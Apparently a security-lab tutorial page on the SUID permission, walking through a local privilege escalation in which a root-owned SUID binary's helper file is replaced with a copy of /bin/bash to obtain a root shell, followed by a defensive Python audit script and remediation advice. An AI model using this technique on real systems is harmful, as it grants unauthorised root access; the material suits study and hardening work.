# SUID

🗒️ [**SUID**](https://www.redhat.com/sysadmin/suid-sgid-sticky-bit) (**S**et owner **U**ser **ID**) is a special access permission given to a file. A file with SUID *always executes as its owner*, regardless of the user running the command.

* Allows unprivileged users to *run scripts or binaries* with `root` permissions, and it's limited to the execution of that specific binary.
* This is not privilege escalation in itself, but it can be used to obtain an elevated session.

  * `e.g.` the **`sudo`** binary

  <figure><img src="/files/JR5M8AKhTFJYxKpNMHmY" alt=""><figcaption></figcaption></figure>
* The exploitation of SUID binaries to get privesc depends on:
  * the **owner** of the SUID file - `e.g.` look for `root` user's SUID binaries
  * **access permissions** - `x` executable permissions are required to execute the SUID binary

## Exploitation

```
ls -al
drwxr-xr-x 1 student student 4096 Sep 22  2018 .
drwxr-xr-x 1 root    root    4096 Sep 22  2018 ..
-rw-r--r-- 1 root    root      88 Sep 22  2018 .bashrc
-r-x------ 1 root    root    8296 Sep 22  2018 greetings
-rwsr-xr-x 1 root    root    8344 Sep 22  2018 welcome
```

📌 The `welcome` file has the `SUID` permission applied: the `s` in the owner's execute position of the permissions column (`-rwsr-xr-x`) indicates the SUID bit.

```
./greetings
	bash: ./greetings: Permission denied
./welcome
	Welcome to Attack Defense Labs
```

```
file welcome
```

```
welcome: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,for GNU/Linux 3.2.0, BuildID[sha1]=199bc8fd6e66e29f770cdc90ece1b95484f34fca, not stripped
```

```
strings welcome
```

<figure><img src="/files/8TeuYrN063Emoz0hoirV" alt=""><figcaption></figcaption></figure>

* It calls the `greetings` binary

```
rm greetings
cp /bin/bash greetings
./welcome
```

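Here we removed the `greetings` binary and created a new file with the same name by copying `/bin/bash` to it. The working directory is owned by `student` (see the `.` entry in the `ls -al` output), so `student` can delete the `root`-owned `greetings` file. When `welcome` runs and calls `greetings`, it now starts `/bin/bash`, which gives us a bash session.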

<figure><img src="/files/SQ6U7qe6KuMu5j9AApD1" alt="" width="289"><figcaption></figcaption></figure>
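A defensive check for the condition shown above, added here as an example and not part of the original page: it lists SUID files that sit in a directory someone other than the file's owner can modify, as with `root`'s `welcome` and `greetings` inside the `student`-owned directory. The function names and the default scan path are assumptions.

```python
import os
import stat
import sys


def dir_lets_others_replace(file_uid, dir_uid, dir_mode):
    """True if a user other than the file's owner (or root) can delete or
    rename entries in the directory, and so swap a file the binary runs."""
    # The directory's owner can always unlink entries, even root-owned ones.
    if dir_uid not in (0, file_uid):
        return True
    # Group/other write on the directory allows the same, unless the sticky
    # bit restricts deletion to the file owner, directory owner and root.
    writable = dir_mode & (stat.S_IWGRP | stat.S_IWOTH)
    return bool(writable) and not dir_mode & stat.S_ISVTX


def audit_suid(root):
    """Return SUID regular files under `root` that sit in a directory
    another user controls."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        d = os.stat(dirpath)
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: do not follow symlinks
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if dir_lets_others_replace(st.st_uid, d.st_uid, d.st_mode):
                findings.append(path)
    return findings


if __name__ == "__main__":
    # Default scan path is an assumption; pass the directory to audit.
    for hit in audit_suid(sys.argv[1] if len(sys.argv) > 1 else "/usr/local"):
        print("SUID binary in a directory its owner does not control:", hit)
```

A finding means any helper the SUID binary launches from that directory can be swapped by the directory's owner or writers; the fix is to keep the binary and its helpers in a `root`-owned, non-writable directory and call helpers by absolute path.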


